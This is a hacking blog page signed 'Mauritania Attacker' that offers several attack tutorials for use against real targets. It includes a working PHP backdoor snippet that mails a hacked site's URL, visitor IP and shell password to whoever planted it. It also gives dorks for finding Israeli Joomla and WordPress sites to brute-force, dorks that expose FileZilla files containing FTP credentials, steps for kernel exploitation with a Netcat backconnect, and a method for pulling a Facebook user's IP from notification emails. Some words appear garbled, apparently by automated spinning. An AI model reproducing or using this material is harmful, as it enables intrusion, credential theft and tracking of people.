Backdoor Shell




Hey friends what's up ! many friendz asked me about Backdooring shells well it's very easy some hackers made it hard for other 'Lammerz' ihihhihiihi XD ! if you want to backdoor a shell it's very easy you have just to place a simple php code in the shell call it what you want example license.php  that's all then you can receive all in your email !



CODE:

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.6 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("writeyouremailhere",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


if you have some knowledge you can develop this code and hack more ^_^

Enjoy!

don't forget to write your email in the code

Hack Joomla And Wordpress|



Hello my friends today i will show you a good method to hack Joomla & Wordpress it's not an exploit because exploits of joomla & Wordpress most of them are in the Components & Plugins example  and you can also find also other exploits like privilege escalation or restoring password admin with the token code , etc ....... many many exploits now i will show you a nice method ^_^


First we gonna use the best searcher better than google cause it doesn't filter your searching i mean google doesn't show you all about hacking ^_^


First thing click on Tumunu isaretle to select all methods and in the black case write your dorks you can put many dorks in the same time.

Then go to the second hidangan Tarama then click on  Taramaya Basla when the research finish click on kaydet and save the file text we gonna need after.

For example i want to hack some websites of Israel using joomla or Wordpress what are the dorks ?


For Joomla

site:il com_user.israel
site:il option=
site:il templates/beez/
site:il template/atomic
site:il com_user.shalom
site:il com_user.shalit



For Wordpress


site:il wp-content
site:il powered by wordpress
site:il wp-content/themes
site:il wp-content/plugins
site:il ?p= wordpress

After that we gonna use the best cracker ^_^





Don't forget when hacking joomla select Joomla if Wordpress select also Wordpress this cracker is combined and very fast, now how to use very simple you need to use a simple wordlist.

Click on sifre kelimelistesi to select you password list and click on Site ekle to select the websites list that we found we the searcher then click on Basla to start attacking ^_^


I uploaded for you the programs here Download also i added for you a simple good password list

Enjoy ;)


Mauritania Attacker.

Filezilla Exploit



Hello friendz today i'm going to inform you about a dangerous exploit that i discovered since 2009 in filezilla and it's still not patched by filezilla system till now 2013 most of websites using ftp client filezilla don't know  about this exploit ^_^ !

So you can find the host , user and the password (login ftp) in the xml files , the files are :

sitemanager.xml and filezilla.xml


So i've made good Dorks :

inurl:sitemanager.xml filetype:xml

or

inurl:filezilla.xml filetype:xml

you can make your own Dorks ^_^ the true hacker always use his brain °-_-°

Enjoy!


Mauritania Attacker.

Hack A Server


Hello my friends , today i will explain you how to hack a server and exploit it ^_^


First thing you gonna do all this from Localhost use "Wamp" or "Easy php". Then upload a shell with full option like my shell ^_^



Now the most important thing is to know what is the version of the server and the kernel version ^_^

We are not going to sasaran a website of the server and try to upload a shell and try to symlink or root ^_^


Linux xxxxxxxxxxx.xxxxxxxxxxx.net 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 Sekolah Menengah Pertama Wed Jan 23 14:53:41 E


As we can see Linux and the kernel version is 2.6.32 x86_64 

Now what to do ?

Go to www.google.com and type this: Linux 2.6.32 x86_64 exploit

you will find many exploits find the right exploit script upload it in your Localhost then edit it with the IP of your

server sasaran  and choose the right port of the exploit if the exploit is SSH (22) , FTP (21) , etc.....

Then use Netcat to make Backconnect from your Shell if Backconnect is not etablished that's mean that your

server sasaran has been patched or you are not using the right port to backconnect or you need to forward 

your port.The rest you can do it from putty i'm not going to talk about this here i'm just giving 

some educational informations ^_^

Another method is to find the host of the server for example if you ping www.google.com 

Ip is 173.194.34.19




The Host is "par03s02-in-f19.1e100.net" but as you know Google is very secured all their system is from localhost

and most of their services in remote are Filtred , so How many Google Websites of some countries was Hacked

Well they wasn't certified by "Google Inc" so if you scanned them in the past you could find a port open in the server

or the host enabled , even a exploit in the kernel or a Dns Exploit ^_^ if you try to telnet the port 25 (SMTP)

of Google you will find it open certainly "Limited" (.....) but there is no a hacker that can exploit it yet ^_^ 



Source: Mauritania HaCker Team

Cpanel Attacker


Hello my friends , some hackers when trying to shell a server find dilema because of the server they try most of exploits such sql , lfi , rfi , exploiting cms like joomla and wordpress , and the success is about 45%


There is a good aktivitas coded  by an Algerian Hacker 'Ghost-dz' wich can crack the cpanels of the server you are trying to shell simple and works perfectly.

I'm not going to explain how to use because it is very basic ^_^

Download

Trace Someone In Facebook



Hello all my friendz many people asking how to trace someone in facebook , well some people think that the noob method with command prompt is the only method lol ^_^ closing all tabs and talking to the victim account then typing "netstat -n" no no i have found the method since 2011 and it's still working and private but i decided to share it.Anyway let me explain it !



This method work with Notification that you receive in your email for example if someone comment your status or send you a message on facebook of course you will receive the notification in your email !


so you are A and your victim is B when your victim comment on your thread in facebook in the system of facebook it will say  A <===========> B

so where to find your victim ip it's simple just go to your email and to the notification and view the source of the message type ctrl+f then search this:

X-Facebook: from zuckmail
 
you wil find a code like this ([MTI3LjAuMC4x]) it's coded in base 64 you have to decode to ascii text then you will find the ip of your sasaran Enj0y!
 
Tool to decode and encode =========>>> http://www.hcidata.info/base64.htm
 
for more information check the first line x-store-info:
 
it has all ;)

Crack Any Hash Type




Hello friends , i have for you a private kegiatan that can crack any hash without wordlist ^_^ your CPU must be powerful that's all , it's coded by a russian friend !



Search

Blog Archive